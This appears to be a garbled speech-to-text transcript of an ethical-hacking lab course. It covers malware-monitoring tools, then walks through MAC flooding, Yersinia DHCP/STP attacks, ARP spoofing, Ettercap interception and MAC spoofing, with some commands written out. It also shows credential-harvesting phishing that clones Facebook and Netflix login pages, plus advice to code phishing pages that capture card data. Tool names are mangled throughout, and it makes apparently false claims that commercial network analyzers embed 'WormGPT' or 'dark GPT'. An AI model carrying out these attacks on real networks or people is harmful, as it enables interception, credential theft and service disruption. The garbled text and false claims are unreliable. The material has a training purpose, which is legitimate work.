So you don't manipulate these DLLs. Otherwise, it will interrupt directly your system. WinSox providers, nothing else. Schedule a task. Uh, Registry organization schedule for cleaning. Registry organization update. That's it. So npcap watchdog. So nmap, there is an something malicious. I want to delete this. That's it. So you can click and display the version and time was automatically run on the system and the stop up. So you just look here, check. You can look by properties also. The properties, security, details, previous version. There is not a disclosed. That's it. So now we would like to go for number 18. So we go for 18 is Perform installation monitoring using Microsoft Install Monitor. Perform installation monitoring using Microsoft Install Monitor. So when the system or user install or uninstall any software applications, there is a chance that it will leave a traces of the application data on the system installation. Monitor helps to detect a hidden and background installation that malware performs. Microsoft Install Monitor automatically monitors what gets placed on your system and allows you to uninstall it completely. Install Monitor works by monitoring when resources such as file and registry are caused. When a program is installed, it provides a detailed information about the software installed, including how a disk space, CPU, and memory and your programs are using. It also provides information about how often you use a different programs. A tree is helpful too that you can use which program to install together. So we would like to install this. Now we would like to come back here. Uh, Go to malware threats. We would like to install this. Click on install. It will start for installing. So now setup is completed. Now we got launch now. So just click on this. So now you would like to look here. So a pop-up is came. So you just look here, 100% clean, improve, search, performance, backup and restore, and get started. So just click finish. So we would like to look here. As in the home tab, you just click on skip a scan. Now we would like to look here now programs. So which I have installed the Nmap, Visual Studio, VMware Tools, Microsoft C++, 21 programs, total size is 1.5 GB. That's it. There is nothing else. Microsoft SQL Server compact with so it is an inbuilt because I was taken Windows Server 2020 19. Then we would like to go for performance. You can look the performance, which one is taking how much CPU, it will be displayed here, everything. Then we go for startup, nothing else, storage. So this will be backup also for you as storage tools. Find a program by Windows, program tree, program are installed together. So I would like to look for Java, then options, updates, uninstall, monitor. So also when you go for performance otherwise programs, so you would like to uninstall this program. So you just click here, uninstall or change. Are you sure you want to completely remove the registry organization? That will be automatically will deleted from here, from entire of your system. So also remove the applications and settings and data. That's it. So when you install normally, you are not deleting the proper way. So this will be helpful without giving a tracebacks also. So install monitor automatically removed and temporarily our files is detected by following changes. Click on OK. Clean up. So including it was given as an cleanup. So we would like to do this one also. Uninstall IDA. That's back here. So you just click on OK. Then you just clean up. So you are not lifting anything to the attacker. So now you just go for 19. So perform a device driver monitoring using driver view and driver viewer. So you just type here perform device driver monitoring using driver view and driver reviewer. So driver view. The driver view utility displays a list of devices drivers are currently loaded on the system. So driver reviewer, without a proper drivers, computers start a misbehave sometimes. Update the drivers using conventional methods can be a daunting task, and outdated drivers are more vulnerable to hacking and can be lead to a breach in the system. Or if you have one of the organization, so you have organizations like Windows or something else. Okay, you are organizations like XYZ platform. So that you are hosted of entire your organizations and you was set up with a static IP address of storing of your Windows system like 1 TB or 10 TB terabytes. If outdated drivers are more vulnerable to hacking, you can lead to a breach in the system. Driver Reviewer provides an effective way to scan your PC to identify out of date drivers. Driver Reviewer can quickly and easily update these drivers and restore optimum performance on your PC and its hardware and extended life. An ethical hacker and penetration tester must and should scan the system of suspicious device drivers and make sure that the system runs smoothly by ensure that all outdated drivers are updated, that the system process optimized to keep the performance on the system is to in the peak level of security. So now I just come back here. I just open this, click on open, click on malware threats. So I would like to set up this. Then click on next. So it may take some time to scan entire of the directory. So you don't need to do it on your main system. So you can do it every time in your virtual machine. So if you want to do any type of task. So it will scan entire of the PC like videos, audio, chipset, network, devices and others. So you can get backup also from here. So once scan is completed, so I want to do it in my Windows system. I don't want to do it in my main system. So the main system will drag too much time. So once you go for home, so you can scan entire of your system. That will give your Windows operating system information, graphic cards. So I'm using as VMware, so that will not display here. Otherwise, it will display here Intel 5 crore or 5 crore or Intel 7 CPU or something else. So you can see here Intel R4 TM Ultra 7 processor. So in this way, it will be displayed here. So you can give as a backup. So you can click on backup. So you can get entire of this one backup. Then you can restore entire of your system. So this is a driver reviewer is best for performance. So now we would like to close this. So the last tutorial in this 20. So just type here. Perform a DNS monitoring using DNS query sniffer. So you just type here. Perform DNS query, DNS monitoring using DNS query sniffer. So DNS query sniffer is a network sniffer utility that shows the DNS query set on your system. For every DNS query, the following information is displayed: host name, port number, query ID, request type, a record, uh, AA records, NS record, MX record, and other types. Request time, response time, duration time, response code, number of records, and the context of return DNS records. You can easily export the DNS query information to like HTML format, TXT format, CSV format. Choice is your wish. So now we would like to install this DNS query sniffer. Here is DNS query sniffer. Uh, so I would like to use as an adapter, which I have. Then I just want to run, click on OK. So now let's see. So the DNS query sniffers start for monitoring of the network traffic and take some time to capture the traffic. Leave the windows as an intact. It shows the DNS query sent on your system along with the complete information such as host name, ports, and address, and multiple things. So it's take a too long, lengthy time process to come here. So we just need to do it here. So this will take a too long and lengthy time process. So once you get as a network two in the system, then only you can get it. So I just want to go to my CMD command prompt here. So please type ping, enter the targeted IP address 18.53. Any response we can get it here, but it never get, like you can see here you have all multiple things. So it will take too long and lengthy type process. So we would like to go for as yes. Now we got the result. You can see here, but we are accepting. It will take too long. We got it here. You can HTML API reverse. So IPNet info of A records. So you are getting like HTML reports of all items using a Firefox. You can OK. Now let's see. So you can see here the targeted IP address 65.123. So you don't need to confuse here. It's like coming with XYZ platform in the cloud front. So when I was ping, so this in AWS Amazon. So someone is targeting name servers. It's in the UK and the source address and destination address. IP country. So I was hidden my IP address and everything. So we would like to look here. So you're getting multiple things here. That's it. So our next task is next is sniffing. So guys, when you come back to another topic is sniffing. So what is sniffing? In cybersecurity, sniffing refers and practice of intercepting and monitoring the network traffic. So this process involves for capturing the data, packets and traveling across the network to analyze the information contained within them. So we are going to do like network troubleshooting, performance the monitoring, and security monitoring. So we are going to use most popular tools like Wireshark, TCP dump, EtherCap, and we would like to do like passive sniffing and active sniffing. So what are the risk measures we can get it here? So the risk measures is like data interceptions, like sensitive information like OTP interception through S7 signaling and system, and man in the middle attack. So if you are connected in the Wi-Fi network, either in public cave coffee shop, otherwise Starbucks or something else, so they can sniff your OTPs and privacy violation. So What are the countermeasures we can use here? Like encryption, network segmentation, monitoring and detection, and MAC address filtering. So now, first, our task is perform MAC flooding using Mac OS. We just right here. Perform MAC flooding using Mac OS. So, MAC flooding is a technique used to compromise the security of the network switches that connect a network segments or network devices. Attacker use a MAC flooding technique to force the switch act as a hub so they can easily sniff the traffic. So, macOS is a Unix and Linux tool that is a part of DNS sniff collection. It floods the local network in random MAC address and IP address, causing some switches to fail and open in repeating mode, thereby facilitating a sniffing. This tool floods the switch cam table by sending a forged MAC address. When the MAC table fills up with the switch converts to the hub-like operations, when an attacker can monitor the data being broadcasted. So now we are going to uh, switch to our Kali Linux. Now open a Wireshark. So I'm starting as an ETH0 of my network. So I'm just starting. So now the my Wireshark is capturing the data. So now I would like to open the terminal. So I just make it for you big. So you just type sudo su and enter the password. So now just type here mac of minus I ETH0 minus n 100. So now you can see here in the Wireshark, which was done with some other external IP address, IPv4 snipping. So this is 1, 2, 3, 4, 5, 6, and that's it. So I got it as 6 requests from the different thing. So macOS sends a packet to the random MAC and IP address all the active machines in a local network. If you are using multiple targets, you will observe the same packets on the target machines. So you can look here as in the this one. You can look this Ethernet to source. You can look here. Then IPv4, it's an offset address security. So 802 and 31 to 2002. So here is using some other thing. So you see a globally unique address. So trailer. So you can capture in this way. So just pick now this one. Now we are going to fit this. So our next tutorial is perform a DHCP starvation attack using Arsenian. Use type here. Starvation attack using Arsenian. So in DHCP starvation attack, an attacker floods the DHCP server by sending a large number of DHCP requests and use all available IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP address, leading to a DOS attack. Because of this issue, A valid user cannot obtain or renew their IP address and thus fail to access their network. This attack can be performed by using various tools such like Arsenia and Pioneer. So Arsenia is a network tool designed to take advantage of weakness in the different network protocols such as DHCP. It pretends to be a solid framework for analyzing and testing and deploy the network in the system. So now we would like to start again the Wireshark. So I would like to start, continue without saving. So now it start for filtering. Now I just open my terminal. So you just type here, you just type clear. So you just type senior minus I. Then and graphical user interface will come. So you just press any one of the key to come. So now we would like to look, press for H for help, you got it all. Then you just quit it here. So now you just press for F2. So it go for uh, capturing the DHCP addresses. So again, you just press for X. So now in the X place, an attack panel is started. So now you can look here. So sending like a TCN BDPU. So I would like to in the attack panel. So I not get any here like a discovered packets. So I would like to use sending conflict BPDUs. So I would like to press for what. So it's not come. The Arsenia is not displaying the thing. So again, I would like to go for, I would like to set a config BPDU. So to, now you can see here, now when you switch to, and here it's like config, it's in STP. So it's moving multiple things. So now I would like to close this, stop. Then I would like to also here again X, claiming a root role with the man in the middle attack. So we would like to look this. So again, I would like to look here. So in the place here protocol, it's come for STP. So you can look also here as it's also sniffing with STP. It's never end. So I would like to go with 6 interface 1. Now you can look here. So it's sniffing a lot. So as a DHCP, we not yet get it here. So I'm just quitting now here. So sometimes you never get this DHCP. And you just type here, quit. So we just quit it here. So now we would like to look one more time. So it never end. So once it's started, even if I close the terminal. Okay, no worries. So this is how you can flood the DHCP flooding. So now we would like to go for, wait without saving. So now, so I would like to go for restart this machine for time being. So now I would like to go for as number 3. Perform ARP poisoning using ARP spoof. ARP poisoning using ARP spoof. So, ARP spoofing is a method of attacking an Ethernet LAN. ARP spoofing succeeds by changing the IP address of the attacker computer to the IP address of target computer. A forged ARP request and replay a packet find a place in the target ARP cache. In this process, as an ARP replay has been forged, the destination of the computer target sends the frame to the attacker computer, where the attacker can modify them before sending them to a source of the machine is man in the middle attack. So ARP spoof redirects the packets from the target host and the LAN intended for another host on the LAN by forging a ARP replay. This is extremely effective way of sniffing the traffic on a switch. So now we just enter your username and password. So Yersinia attack is a powerful attack for DOS attack. So it flood continuously even if it's not stopping also. So now we would like to go for open here again a Wireshark. So now click on starting. Now it's coming like ARP. Now I would like to open the terminal. You just type big, you just type sudo su or enter the password. So I would like to spoof ARP spoof from the targeted IP address from my main system to and my Ubuntu system. So now let's see. So now when you switch to the you can look here all ARP requests which is going at traffic VMware UI. You can see here all the information going to here. So you can if you know the targeted IP address, then you can switch it and broadcast all the information here. So I'm just quitting this. So I just suspended. Now you just stop this. Internet protocol. So what else the information is broadcasted? You can look here address resolution protocol, size and request, send IP address from the Huawei Techno. So it is a gateway and targeted IP address to the this one I think Windows. So what else it's gone? So it with everything is broadcasted. So once you are in like any one of the Wi-Fi network, you can capture the ARP request. What is the message sent? The package is also filtered. So you can look here like HTTP messages, everything here. So that you are going to do a further. So this is how you can perform ARP spoofing. So attacker uses a ARP spoof tool to obtain the ARP cache. Then the MAC address is replaced with that an attacker system. Therefore, any traffic following from the victim to the gateway, it will be redirected to the attacker system. That's it. Now we are going to do as this and this also. So perform a man in the middle attack using the EtherCap. We are going to use perform a man in the middle attack using the ether cap. So, an attacker can obtain username passwords using various techniques by capturing a data packets. By an attacker capturing enough packets, attacker can extract the target username password if a victim authenticates themselves in public network, especially on unsecure website. Once password is hacked, an attacker can use the password to interfere with the victim's accounts, such as like logging into the victim's email account, logging into the target, anything else. So what else victim can use? A Starbucks, bank accounts, or some personal things, anything. So as a prospective measures, an organization or administrator should advise employees not to provide a sensitive information while in public network without HTTP connections or VPN or SSH tunneling must be used to secure the network connection. An expert ethical hacker and penetration tester must and should have a sound knowledge for sniffing, network protocol, and their topology, TCP and UDP services, routing tables, remote access, SSH or VPN, authentication mechanisms, and encryption techniques also. And man in the middle attack is used to introduce into an existing connections between system and the interceptor of the targeted computer, mobile phone, or tablet, anything else you can consider. Using various techniques, attacker can split the TCP connection into two connections, a client and attacker connection, and an attacker to a server connection. After a successful interception, a TCP connection, the attacker can read and modify and insert the fraudulent data into an intercepted communications also. So for that we are going to using here this. So here we are using that EtherCap graphical. So you need to prompt add your password. So once it's done, so you just also look as an bridge for this. So you just click on OK. So now it was sniffing all the information here. So now how we can get it this far? Okay. So I have my gateway of IP address 192.168.18.1. This is my gateway. So I would like to look in the target, current targets. There is no current targets to sniff. So you can add my IP address of Kali Linux is 192.168.26. Then click on OK. Then on target 2 is I would like to enter as 27 for my Ubuntu OS. So what else the data is sniffed? We can see here we have added the target. Then we would like to go for targets, select the targets, MAC address, IP address, IP64 address. So we know how. We have only the IP address. When you enter the IP address 18.26 and port you can consider is 80 and you can enter again 18.27, port is 80, then click on OK. So you can see here as an request is went and DNS. So once you come back here again, so protocol or so what else it's gone we are going to look. So we would like to look here view as connections. So what else is the connections is available in my system? You can look here as in something we got it here. No, it's still sniffing. So all the ports is available. So you can filter the ports. You can see here 5353 closing is active and it was killed. So you can look all from here. So once you go for view, profiles. So what else? The profiles is activated. You can see here all the profiles. So this is an static IP address. Now we would like to go for statistics. So these are statistics. You can look here, and we would like to look visualization methods. Yes. Now you can look all the filters and login. So logging all packets info. So that you need to be do this one under the root access. Like you just type here sudo su. Then you just need to enter here ethercap. Then enter your targeted IP address. Otherwise, your destination of company's IP address. Then you can sniff the all information. So as of testing, I'm not showing much here. Now we would like to close this. So only a practical way I'm showing. When you go for login, logging only info, login user messages, log user. So you just need to go for as and root information. Then you can get all the information. So the old tool is scan and able. So that also perform the same thing, but that is too uh, complicated to perform. So now we are going for another task is come back here. So spoof a MAC address using TMAC and SMAC. So a MAC duplicating or spoofing attacker involves a sniffing a network for the MAC address for legitimate clients connected to the network. In the attack, the attacker first retrieves the MAC address of a client who is actively associated with the switchboard. Then the attacker spoofs their own MAC address with the MAC address of legitimate client. Once the spoofing is successful, the attacker receives all the traffic destination for the client. Thus, an attacker can gain the access of the network and take over the identity of the user. If an administrator does not have adequate packet sniffing skills, it's hard to defend against such institutions. So, an expert ethical hacker and penetration tester must know how to spoof a MAC address and sniff the network packets and perform ARP poisoning, network spoofing, and DNS poisoning. This lab demonstrates how to spoof a MAC address to remain unknown to an attacker. So, now we would like to come back here. So, open this. We would like to go here. Open this tools, sniffing, MAC spoofing tool. So, first we would like to use TMAC. So first we would like to install this. Next, click on this, install. Click on finish. So now launch this. It asks a permission. We just type yes. So now it was changing. So once you see here your original MAC IP address, you can see here your original MAC address. So now when you click on here, your random IP address, you can see here, and I am getting like 100 Mbps per second, and my Wi-Fi is 650 Mbps per second. Okay, that's it. So I would like to generate any type of random MAC address. So here you can see here 00FFFF. So I would like to generate this and click on change now. I have changed successfully as an MAC address. So here now active MAC address you can see here is changed. So you just copy this one. So you would like to look here my active MAC address now is this one. So now I would like to look my active MAC address here. So now I would like to go for this one, SMAC. So now I would like to identify SMAC. So I would like to install this. So it will take a little bit time. 1 second. It almost all installed. So now it was installed. So you just click on I accept. So you just close this. So why it was closed? Again, we would like to open. You just proceed it. So now once you see here, uh, spoofed MAC address, active MAC address, okay, and Wi-Fi 2. So now you just click on update MAC address. Now it was updating your MAC address. Now let's see. So adapter restart is completed. So now you just click on random. You can look on this. No. When you look on this, oh, wait, see. So you can select a track communication INC. I would like to go for as a refresh. So you can look here, this 00FFB4432720. So this is my active MAC address. So I'm not able to change my local IP address. So I just only change for my VMware. So this is my active MAC address, which I was seeing here. So we would like to look. So you can refresh it. You can look also MAC list. So if you have as a MAC address, so you can load your MAC list and you can put in that MAC address as for random for communicating and spoofing here. So now you would like to look. That's it. So now you can see our active for MAC address. So this is how you can perform a spoofing of MAC address. So now we would like to go back here and we would like to uh, go for number 6. Spoof a MAC address of Linux machine using MAC changer. So a MAC address is an unique number that can be assigned to every network interface, and it is used by various system programs as protocol to identify a network interface. It is not possible to change a MAC address. It's hard coded in the network interface controller. However, many drivers allows the MAC address to be changed. Some tools can be make the operating system believe that NIC as the MAC address of user's choice. Masking the MAC address is known as MAC spoofing and involves in changing the computer's identity. MAC spoofing can be performed using a numerous tool. So we would like to look here. First, I would like to come back here, open our kernel Linux, so just type clear. So first, I would like to show you my IP address. So you just type here ipconfig So you can see here, this is my MAC address considered. Okay. So now we would like to look here. So first I just type here, I've config, it0 down. Now I just put my internet as down. Now you can see here it was disconnected. So you just type here MAC changer minus help. You can see here all help. So don't change the vendor bytes. And when you look for S, show a print of MAC address. So first we would like to enter the our MAC address. So just type here MAC changer minus S is 0. So this is our MAC address. You can look here 000C 292A 4938. The same thing 000C 0C 292A 4938. This is my MAC address. So now I would like to change the MAC address. So for that, for changing, as set another vendor for MAC address as the same kind. So you just type here MAC changer minus A is 0. So current MAC address, okay, this one, and permanent MAC address is this one. So now new MAC address as ERST, we have got it. So now I would like to set a random, fully random MAC address. So for that, I would like to type here MAC changer minus R is 0. So now we have set up our MAC address. This is our new MAC address, and this is our permanent MAC address, and our current MAC address. We can see here ERST. So now we would like to look for ifconfig is 0, and you just type up. So now the internet will come. Now we would like to look here as same ifconfig. Now you can see here our MAC address is changed successfully. You can see here compared to this one, before one. Now it was changed our MAC address. That's it. So you can observe the random MAC address in the set of network interfaces. So we observe already. So now we go for as another tutorial is number 7. Perform password sniffing using Wireshark. So Wireshark is a network packet analyzer used to capture a network packets and display a packet data in detail. The tool uses a WIN PCAP to capture packets on its own, supported by networks. It captures a live network traffic from Ethernet and ATM, Bluetooth, USB, token ring, frame relay, and FDDI networks, and captured files can programmatically edited via command line. A set of filter customized data displays and can be refined using a display filter. So for this, I would like to use my Windows system for capturing something. So I just open as Firefox. So I just want to open it. So you just type test php vulnerweb.com. So once you click on yes, so here we have a test and test. Come back here. So I would like to use for a Wireshark So you just click on the Wireshark. So it's start for capturing the packets. Now I can see here all TCP packets with some of the uh, static IP address, and it was involved with the DHCP IP address. So once I go here, now I just type here username as test, password as test. So I don't want to do any one of the live test demos for this YouTube community guidelines. So we have successfully logged in. So you just stop this. Now you just type HTTP request equal to post. Then enter. So you not yet get it here as a post. So you get all the details in the post. So you can look here, get in the post. When you look hypertext transfer protocol, you can look here host. You can open in another tab. So I would like to make it as big. So you go for userinfo.php. Host is this one. So application in content. So test one web. So you get all here. Like once you capture the post request, okay, you get the post request like all information, like username and password. So an attacker can utilize this one. Uh, this and he can use any other things like for capturing and using for malicious activities and everything. So even you can capture the RTP and network protocol by configuring by your Windows. So even you can do with this by Linux. uh, you don't need to configure anything. So Windows only you need to configure much more things. So that's it. So I don't want to save anything else here. So you just put it here. So and another some of the paid tools I would like to tell you. Analyze a network using Omni Peak Network Protocol. So you just write here. Analyze a network using the Omni Peak Network Protocol. Sorry, network protocol analyzer. So OmniPeak is a network analyzer provides for real-time visibilities and expert analysis of each part of the target network. It performs for analysis, drill down, and fixes the performance bottleneck across the multiple network segments. It includes analytic plugins that provides a targeted visualization on such abilities. An ethical hacker or penetration tester can use this tool to monitor and analyze the network traffic on the targeted system. In real time, identify the source of location and traffic and attempts to obtain a sensitive information as well as find any network loopholes. So we would like to look here, open new tab, we just type here, Omni Network Analyzer. So you just need to get it from here as a live action. So you just need to try as a free trial. So I just don't like to input all my details to request as a free trial. So as of your company network, otherwise your Cisco operator, Cisco network analyzer, you need to must and should take this one. So there is nothing else as an special. So they just designed as an C uh, language. As this tool, they just added as an uh, what is this? Chat GPT. That's it. So they can design the network like this protocol, that's it. And they was added as an warm GPT, otherwise dark GPT. That's it. So that will give you much more dark information how to prevent or solve this one. That's it. So we would like to go another tutorial is So I'm not going to do this all paid tools. I'm just giving you as here. So just here. So you can, if you want, you can try as your wish. So we go for another is analyze a network using a steel central packet analyzer. So Steel Central Packet Analyzer provides a graphical console of high-speed packet analysis. It captures terabytes of packets, data traversing the network. It reads and displays in the graphical user interfaces. It can analyze multi-gigabytes recordings from locally presented trace files on the remote Steel Central NetSharp probes without a large file transfer to identify anomalous network issues or diagnose and troubleshoot a complex network and applications perform issues down to a bit level. So now we would like to go for open new tab. You just type here. So we would like to look here as in Riverbird all the products. So you can analyze all those things. What tells the product category? So you can look here, extend holistic network observability, and you can look all those things, mobile digital experience and AI, artificial intelligence ops. Learn AI ops, a streamline for IT operations and service delivery using artificial intelligence. And so I would like to close this. Second. So you can look all the Alternity user journey, Riverbird portal, Riverbird NetIR. So you have multiple products here. So these are all paid products which they was used with artificial intelligence. So I prefer artificial intelligence. They just coded as a dark GPT, so that they was attached here. So you are paying for subscription to using this for 1 month or 2 months or 3 months. That's it here. So I strongly recommend. I don't like to use all those things. So as of penetration industrial, otherwise IT security administrator must and should try these tools. So that will give a graphical user interfaces like uh, what is the loopholes and where you can get analyze the data. Everything you can get here. Now we would like to go for so we would like to go for the last one is detect ARP poisoning using CAPTCHA network. So it's here. So CAPTCHA network analyzer. So what is a CAPTCHA network analyzer? CAPTCHA is a portable network performance analysis and diagnostic tool. Provides a packet capture and analysis of capabilities with an easy to use interface that allows a user to protect and monitor network in a critical business environment. It helps a ethical hacker or penetration tester quickly detect ARP poisoning and ARP flooding attack and in locating attack source. So you just need to get from here, you just open, you just write here colasoft.com. So you just need to download all your required tool. It's also a paid tool. I don't like to recommend any type of paid tool for you to download and get it done here. Okay, so uh, do it on beyond your risk. So it's not like you are losing anything money. So it's just like it will releasing your stress on working. That's it. So you would like to look all products. So you just look here, all the products, which here is available. So caps are free, Mac Scanner, Packet Player, Packet Builder, Ping Tool. So this is a best tool for which you want to try out. So they can give with a 30 days try. So once in this, the software is expires, what is they provide as a license key also, that will be not going to be work out. So you need to play very securely while installing a third party applications. Okay. So we are closing here as sniffing. Now we are coming as social engineering. Yeah. So, so I'm just closing here. So our target is social engineering. So what is social engineering? Social engineering in the context of cybersecurity refers of manipulation of individuals into a performing an actions or making some persons as scamming or manipulating their brain and accessing their credentials and what else you require. So, so commonly techniques they are used like phishing, otherwise spear phishing and pretexting, baiting and quid pro quo and tailgating. So we are going to use our first task is here is sniff a credentials using social engineering toolkit. So just type here sniff uh, credentials using social engineering toolkit. So social engineering toolkit is an open source Python driven tool aimed at penetration testing. Via social engineering, we call it as SCT, is and practically useful for attacker because it's freely available on GitHub or any other platform. Can be used to carry a out range of attacks. For example, it allows an attacker to draft email messages and attach a malicious file and send them to a large number of people using a spear phishing. Moreover, SCT multiple attacks methods allows a Java applet, the Metasploit browser, and credential harvester and tab mapping to be used to a simultaneously and set categorized attacks according to the target attacker vector used such as email, web, USB, many things. An ethical hacker or penetration tester or security administrator, you should be familiar with social engineering toolkit and be able to use it and perform various tests of network vulnerabilities. So we would like to use as Kali Linux. So in my Kali Linux, I was get it here as sudo su. So in my Kali Linux, I just try clear. So I was activated the Apache server I don't like to use in my Kali Linux. So I would like to switch in my event to. So you just enter the password. So I want to try Ubuntu for SC toolkit. So you just no, it's not coming. So we just open the terminal. So you just type sudo su and enter the password. So So I just type SC toolkit. So now it was started SC toolkit. So number you just type here social engineering attack. So number one. So now we would like to look here website attack on vector number two. Now we just use here credential harvester attack on method number three. Now you just need to use as site cloner number two and IP address. So we just type here, open new tab. So you just need to enter IPA. So this is your targeted IP address 27. So you just enter the targeted IP address 18.27. So enter the URL to clone. So you just enter the URL www.facebook.com. So now we can see here, now it was started. Now we would like to go with our targeted IP address. Open the Firefox. So here we would like to enter our targeted IP address is our event to IP address. We just enter 192.168.18.27. That's it. Now we would like to visit this. So now you can see here as an Facebook is coming here directly. As of network week, you can see here as a network week is taking a bit time to come. Firefox, a web browser, is not responding. Yes, now it was responding. So in the malicious IP address, it's not come with as an original Facebook app. Okay, so you can enter any one of the random. Okay, so I just enter any one of the random. As here is, I would like to enter. Let's see. So it's taken a bit time to come because of event 2 is taking a. So you just enter 1, 2, 3, 4, 5, 6, 7, 8, 9. Password is TCPL Alex. So I just enter here. You just click on login. Now don't want to send. Then you just look here. So here as a much data is coming here. So here the connection was reset here. I would like to open as big. Possible username file find is 0. You got it all the information here. Possible password field, spin bank. So it's not capturing. So I not yet enter the. So once you enter the right username and password only, it's getting. So Ubuntu is upgraded. So you have finish means control X. So it's not getting the thing here. So I just here. So it's not printing. So you can look here. So here we can get it here. The login, username and password. That's it in the terminal. So this is how you can perform the social engineering attack. So I would like to show you in another way. So I'm just splitting this. Come back. So this also, it's taking too much time. So I just split. You just type here. You just type C. You just type exit. So now I would like to use here as a shellfish. So I would like to go to a cd shellfish ls bash shellfish.sh. So now the tool is loading. So you can try as you wish, like Google, Microsoft, Netflix. So we would like to go for Netflix, number 5. And I would like to use like a local host. I don't want to start. So when you're doing a social engineering toolkit attack, so you must and should be used like either like creating a scan page entirely like a Facebook or same of your targeted thing. Then you need to code it yourself. Like you want to get like credit card information, something else, like some other things. So you need to code it yourself. uh, then I choose as an Netflix, then I using as an local host, then port is 555 as default. Now I need to go to this targeted, copy this. Otherwise I just open the link. So we just split. So now you can look here, our local host. Netflix is came same as it is as a Netflix. It was loading now. You can see here. So exact of Netflix user. So when client think when I'm logging to a Netflix, it's same as it is. Okay. So you just need to enter as an email. So I just entering my email like for as a testing demo. So don't message me into my emails. Pentester Club at gmail.com. So as a testing demo only, I'm just showing 1, 2, 3, 4, 5, 6, 7, 8, 9, 0. So I'm just click on sign. So it will redirect to now a Netflix targeted website. So it will show update a phone or password. So you just enter email address, then it will go for again for login. So you need a client thing. So I am the wrong person. So I need to update. So he will update it himself. The email address, otherwise text to get email. So that's it. So now we would like to go here. You can see here, I just enter a random thing. Okay. Victim account number, password. So I'm not gonna use like Netflix or anything else. That's it. So uh, that's it. So for the phishing attacks. So you just need to code as your background. However, what is your target? You need to code accordingly to that. So there is a lot of coding or spamming things is available in the market. So you can do. So you need to be a developer for C++, I mean, sorry, HTML, CSS, and PHP. If you are good enough in this, so you are perfectly can do the social engineering attack. So now we are going to do for another thing is detect phishing using Netcraft. So Netcraft anti-phishing community is an game neighborhood watch scheme empowering the most alert or most expert members to define everyone within the community against a phishing attack. The Netcraft extension provides updated and extensive information about the sites that users visit regularly. It also blocks a dangerous site This information helps user to make an informed choice about the integrity of those sites. So I'm not gonna quitting this here. I'm going to show you a reality here for you. So I already have as a netcraft. So I would like to look here. Uh, so I would like to visit as a netcraft Netflix. Now you can see the Netflix. So I already installed a netcraft as an extension. So you just click on this extension. So now what else you targeted visited website? You can see here www.netflix.com sites report. Then you can look here. It was posted in the amazon.com. I mean AWS Amazon. That's it. You can look as a site report. So it was going in another thing. So even you can report as an spam of this targeted website. And so once you click here, the subdomains will become here. Site rank number is 23. Okay. Now I would like to show you the difference of real one and fake one. So with this one is you have seen here. Okay. Now I would like to. So they was hosted in the Amazon Europe and the West in the Ireland of the data center. So now I would like to quit this. Now I would like to open. Come back here. So you just type here local host 355. So you got it again as a Netflix. So this is a spam Netflix. So how you would like to identify everything here? So you just look here. So you just look here. Site information is not available. Then you can consider it's a fake. This is a fake information. So when using this netcraft is most helpful while you are performing as a live website, otherwise a fraud or something. So this netcraft extension will guess you and prevent either by fake website, fake apps, and everything. So once you got a site information is not available, then you are not going to use these targeted websites. So now we would like to go for detect a phishing using a fish tank. So go for number 3. Detect phishing using fish tank. So fish tank is a free community site on which anyone can submit and verify a track and share a phishing data as an official website notice. It's a collaborative clearinghouse of the data and information about phishing on the internet. A fish tank provide an open API for developers and researchers and integrate an anti-phishing data into their applications. So now we would like to look here. We would like to enter fishtank.com. So you just enter www dot. We would like to go for here as a facebook.com. Then we would like to look is possible to fish or not. The site is not as a phishing site. You can as verify also as a fish, but you need to add account as an it will not take an any type of user registrations at the moment. So it was closed. So you can also look here as a site report which was developed on November 2006. It was posted in the Cloudflare and site rank is you got it here. Uh, so when you go for some other things like uh, quite pro So, uh, so this was something for something like Latin pairs used for English. So they also use for as this technique used in the social engineering. So it's coming in different way. So and I would like to look here tailgating. Tailgating is an action of a driver driving into a behind the another vehicle while not leaving the sufficient distance to stop without causing a collision. If vehicle front stops suddenly. So tailgating in fishing. So tailgating attack. So we would like to look here. So you can observe many things here. Tailgating attack. So what are tailgating attack? How to protect yourself from them? Tailgating is an type of social engineering attack where an unauthorized person gains an physical access of an off-limit locations, paves the password-protected area where they might steal a sensitive information, damage the property, and compromise user credentials, even install a malware on the computers. That's it. So, like to go for our next is denial of service. So we are going to discuss about denial of service. So now we are discussing about denial of service. So what is denial of service? So denial of service is like DOS attack or DDoS attack. So what is DOS? Denial of service or distributed denial of service. Both DOS and DDoS attacks aim to make a network service or a system unavailable. So, to its intended user, they differ mainly in their execution method or scale. So, what is a DOS attack? A DOS attack involves a single attacker using one internet connection to overcome a target system with excessive traffic of requests, rendering it unavailable to legitimate of the users. Like I posted the Amazon.com, every day they can purchase 5,000 to 10,000 products. So if I not yet make if some client make on my targeted system Amazon.com as a website, my website will be down. I lose the customers, I lose the money, I lose the time. So we would like to look. Another one, what is distributed denial of service? So a DDoS attack involves for multiple compromised systems after a part of like you can consider as botnet. Flooding the target with a traffic distributed nature of attack makes it more difficult to mitigate compared to a DOS attack. So in the DOS attack, we can do like a ping flood, scan flood, UDP flood, HTTP flood. So in the DOS attack, we can see like volumetric attacks, protocol attacks, application layer attack. So what are the effects we can get it? So if you are a business owner, you have a targeted website. If they do a DOS attack, the system will be become a downtime automatically. Once they do a DOS and DDoS and resource execution, security breaches also it will be done sometime. Firewalls and instruction detection systems and rate limiting, load balancer. So we need to take a call measures like firewall and instruction detection system, rate limiting, load balancer, content delivery network, and anti-DDoS service and regular monitoring also. We would like to look regular monitoring. So our first task is perform a DOS attack using a scan flooding on targeted host using Metasploit. DOS attack flooding on a target host using Metasploit. So Scanflood takes an advantage of a flaw with an regards to how most hosts implement the TCP three-way handshake. This attack occurs when an introducer sends unlimited scan requests to the host system. The process of transmitting a such packets is faster than the system can handle. Normally, the connection established with TCP three-way handshake, and the host keeps track practically and open connections while waiting for listening queue for response for acknowledged packet. So Metasploit is a penetration testing platform that allows a user to find exploit to validate vulnerabilities. Also, it provides an infrastructure content and tool to conduct penetration tests and comprehensive security auditing. The Metasploit framework has numerous auxiliary modules script that can be used to perform DOS attacks. So now we would like to open our Kali Linux. So you just type here, open a terminal. You just type here sudo nmap 421 and enter the target IP address 27. So it will display why it was closed. Now I try to connect. Once again. So now again we would like to look. So it was showing it was closed and their MAC address. So but it was connected. So we would like to flood this one only. So before I'm going to flooding this, I just open as Wireshark. Now let's see. So here Wireshark I cannot able to open. This is the wrong SH remote capture. So in Ubuntu is a wrong way to open here. So just open a terminal. Just type su enter your password. Just type clear Wireshark sniff hit 0. Okay. Just use Wireshark -i hit 0. So here now we are getting here when you open this one. So we would like to open this So what else the traffic will come inbound? We can get it here. So now we just leave it this one. So now come back to a 